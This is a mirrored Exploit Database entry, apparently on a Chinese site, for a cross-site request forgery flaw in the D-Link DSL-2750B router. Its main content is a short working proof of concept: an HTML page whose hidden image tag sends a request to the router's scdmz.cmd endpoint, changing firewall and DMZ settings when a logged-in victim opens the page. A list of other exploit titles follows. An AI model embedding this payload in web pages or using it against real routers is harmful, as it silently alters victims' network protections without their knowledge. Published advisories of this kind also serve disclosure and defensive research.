D-Link DSL-2750B ADSL Route’ – Cross-Site Request Forgery

Exploit Database
101 阅读

作者： killall-9

日期： 2014-02-11
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/31569/

# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
# Date : 10-02-2014
# Author : killall-9@mail.com
# Vendor site : http://www.d-link.com
# Version : DSL-2750B 
# Tested on : Firmware Version: EU_2.02; Hardware Version: B1

The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.

POC=>

<html lang="en">
<head>
<title>Pinata-CSRF-poc for D-Link</title>
</head>
<body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
</body>
</html>

cincin°°°

last Exploits
D-Link DSL-2750B ADSL Route’ – Cross-Site Request Forgery的更多信息

WHM – ‘filtername’ Cross-Site Scripting：
Oracle Demantra 12.2.1 – Arbitrary File Disclosure：
WordPress Theme Suco – ‘themify-ajax.php’ Arbitrary File Upload：
4images v1.7.11 – ‘Profile Image’ Stored Cross-Site Scripting：
jira 4.4.3 / greenhopper < 5.9.8 - Multiple Vulnerabilities：
Ozeki SMS Gateway 10.3.208 – Arbitrary File Read (Unauthenticated)：
Pacer Edition CMS 2.1 – ‘rm’ Arbitrary File Deletion：
phpThumb – ‘phpThumbDebug’ Information Disclosure：